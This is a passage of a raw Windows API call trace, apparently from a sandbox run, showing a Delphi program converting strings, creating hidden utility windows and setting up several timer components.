CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x71e0128, cchWideChar=11 | out: lpWideCharStr="tmrI8MTimer") returned 11 [0039.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrI8MTimer", cchWideChar=11, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrI8MTimer\x0b", lpUsedDefaultChar=0x0) returned 11 [0039.690] KillTimer (hWnd=0x40148, uIDEvent=0x1) returned 0 [0039.690] SetTimer (hWnd=0x40148, nIDEvent=0x1, uElapse=0x5dc, lpTimerFunc=0x0) returned 0x1 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left敭r\x01") returned 4 [0039.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca2dc, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt敭r\x01") returned 3 [0039.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca29c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=10, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 10 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=10, lpWideCharStr=0x71ca298, cchWideChar=10 | out: lpWideCharStr="tmrM8Bl0ck馰ܜ朐ۆ") returned 10 [0039.690] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca29c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.690] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.690] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.690] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.690] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x30150 [0039.691] SetWindowLongW (hWnd=0x30150, nIndex=-4, dwNewLong=83759022) returned 112917644 [0039.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8Bl0ck", cchWideChar=10, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8Bl0ck", lpUsedDefaultChar=0x0) returned 10 [0039.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.691] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimerr") returned 7 [0039.691] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca2d8, cbMultiByte=15, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 15 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca2d8, cbMultiByte=15, lpWideCharStr=0x71e6d88, cchWideChar=15 | out: lpWideCharStr="tmrM8Bl0ckTimer") returned 15 [0039.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM8Bl0ckTimer", cchWideChar=15, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM8Bl0ckTimer\x0f", lpUsedDefaultChar=0x0) returned 15 [0039.692] KillTimer (hWnd=0x30150, uIDEvent=0x1) returned 0 [0039.692] SetTimer (hWnd=0x30150, nIDEvent=0x1, uElapse=0x3e8, lpTimerFunc=0x0) returned 0x1 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Left正") returned 4 [0039.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Topt正") returned 3 [0039.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca2fc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="tmrM82") returned 6 [0039.692] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca2dc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.692] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.692] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.692] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.693] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x6013e [0039.693] SetWindowLongW (hWnd=0x6013e, nIndex=-4, dwNewLong=83759009) returned 112917644 [0039.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.693] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM82", cchWideChar=6, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM82", lpUsedDefaultChar=0x0) returned 6 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca2d8, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.694] KillTimer (hWnd=0x6013e, uIDEvent=0x1) returned 0 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 11 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=11, lpWideCharStr=0x71e0128, cchWideChar=11 | out: lpWideCharStr="tmrM82Timer") returned 11 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM82Timer", cchWideChar=11, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM82Timer\x0b", lpUsedDefaultChar=0x0) returned 11 [0039.694] KillTimer (hWnd=0x6013e, uIDEvent=0x1) returned 0 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1668, cchWideChar=4 | out: lpWideCharStr="Left敭r\x01") returned 4 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca29c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1668, cchWideChar=3 | out: lpWideCharStr="Topt敭r\x01") returned 3 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca31c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=6, lpWideCharStr=0x71d1668, cchWideChar=6 | out: lpWideCharStr="TTimerೠܝ\x02") returned 6 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=12, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=12, lpWideCharStr=0x71e0150, cchWideChar=12 | out: lpWideCharStr="tmrF4s38M100r") returned 12 [0039.694] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca31c, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.694] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.694] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.694] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.695] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x600fc [0039.696] SetWindowLongW (hWnd=0x600fc, nIndex=-4, dwNewLong=83758996) returned 112917644 [0039.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrF4s38M100", cchWideChar=12, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrF4s38M100", lpUsedDefaultChar=0x0) returned 12 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e0154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.696] KillTimer (hWnd=0x600fc, uIDEvent=0x1) returned 0 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=8, lpWideCharStr=0x71ca2d8, cchWideChar=8 | out: lpWideCharStr="Intervald") returned 8 [0039.696] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Interval", cchWideChar=8, lpMultiByteStr=0x71e6d8c, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Intervall", lpUsedDefaultChar=0x0) returned 8 [0039.696] KillTimer (hWnd=0x600fc, uIDEvent=0x1) returned 0 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.696] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1680, cbMultiByte=7, lpWideCharStr=0x71ca318, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e012c, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=17, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 17 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca298, cbMultiByte=17, lpWideCharStr=0x71e6d88, cchWideChar=17 | out: lpWideCharStr="tmrF4s38M100Timer") returned 17 [0039.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrF4s38M100Timer", cchWideChar=17, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrF4s38M100Timer", lpUsedDefaultChar=0x0) returned 17 [0039.697] KillTimer (hWnd=0x600fc, uIDEvent=0x1) returned 0 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=4, lpWideCharStr=0x71d1680, cchWideChar=4 | out: lpWideCharStr="Leftㅍ〰") returned 4 [0039.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Left", cchWideChar=4, lpMultiByteStr=0x71ca31c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="LeftT", lpUsedDefaultChar=0x0) returned 4 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d8518, cbMultiByte=3, lpWideCharStr=0x71d1680, cchWideChar=3 | out: lpWideCharStr="Toptㅍ〰") returned 3 [0039.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Top", cchWideChar=3, lpMultiByteStr=0x71ca2dc, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Top", lpUsedDefaultChar=0x0) returned 3 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=6, lpWideCharStr=0x71d1680, cchWideChar=6 | out: lpWideCharStr="TTimer") returned 6 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=9, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 9 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=9, lpWideCharStr=0x71ca2d8, cchWideChar=9 | out: lpWideCharStr="tmrM81mg2") returned 9 [0039.697] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x6cb99c5, cbMultiByte=6, lpWideCharStr=0x71ca2dc, cchWideChar=7 | out: lpWideCharStr="TTimer") returned 6 [0039.697] CompareStringW (Locale=0x7f, dwCmpFlags=0x1, lpString1="TTimer", cchCount1=6, lpString2="TTimer", cchCount2=6) returned 2 [0039.697] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4c1, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="¡\x1c\x07çF\x95u<¡\x1c\x07\x88½\x0b", lpUsedDefaultChar=0x0) returned 0 [0039.697] GetClassInfoW (in: hInstance=0x6ba0000, lpClassName="TPUtilWindow", lpWndClass=0x68ff5c0 | out: lpWndClass=0x68ff5c0) returned 1 [0039.697] CreateWindowExW (dwExStyle=0x80, lpClassName="TPUtilWindow", lpWindowName="", dwStyle=0x80000000, X=0, Y=0, nWidth=0, nHeight=0, hWndParent=0x0, hMenu=0x0, hInstance=0x6ba0000, lpParam=0x0) returned 0x4010c [0039.698] SetWindowLongW (hWnd=0x4010c, nIndex=-4, dwNewLong=83758983) returned 112917644 [0039.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="", lpUsedDefaultChar=0x0) returned 0 [0039.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM81mg2", cchWideChar=9, lpMultiByteStr=0x68ff4d5, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM81mg2", lpUsedDefaultChar=0x0) returned 9 [0039.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca2d8, cchWideChar=7 | out: lpWideCharStr="Enabledr") returned 7 [0039.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Enabled", cchWideChar=7, lpMultiByteStr=0x71e0154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Enabled", lpUsedDefaultChar=0x0) returned 7 [0039.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="False", cchWideChar=5, lpMultiByteStr=0x71ca33c, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="False", lpUsedDefaultChar=0x0) returned 5 [0039.698] KillTimer (hWnd=0x4010c, uIDEvent=0x1) returned 0 [0039.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 7 [0039.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71d1668, cbMultiByte=7, lpWideCharStr=0x71ca298, cchWideChar=7 | out: lpWideCharStr="OnTimered") returned 7 [0039.698] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnTimer", cchWideChar=7, lpMultiByteStr=0x71e0154, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnTimer", lpUsedDefaultChar=0x0) returned 7 [0039.698] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca2d8, cbMultiByte=14, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0039.699] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x8, lpMultiByteStr=0x71ca2d8, cbMultiByte=14, lpWideCharStr=0x71e0150, cchWideChar=14 | out: lpWideCharStr="tmrM81mg2Timer") returned 14 [0039.699] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="tmrM81mg2Timer", cchWideChar=14, lpMultiByteStr=0x68ff425, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tmrM81mg2Timer", lpUsedDefaultChar=0x0) returned 14 [0039.699] KillTimer (hWnd=0x4010c, uIDEvent=0x1) returned 0 [0039.699] MultiByteToWideChar (in: 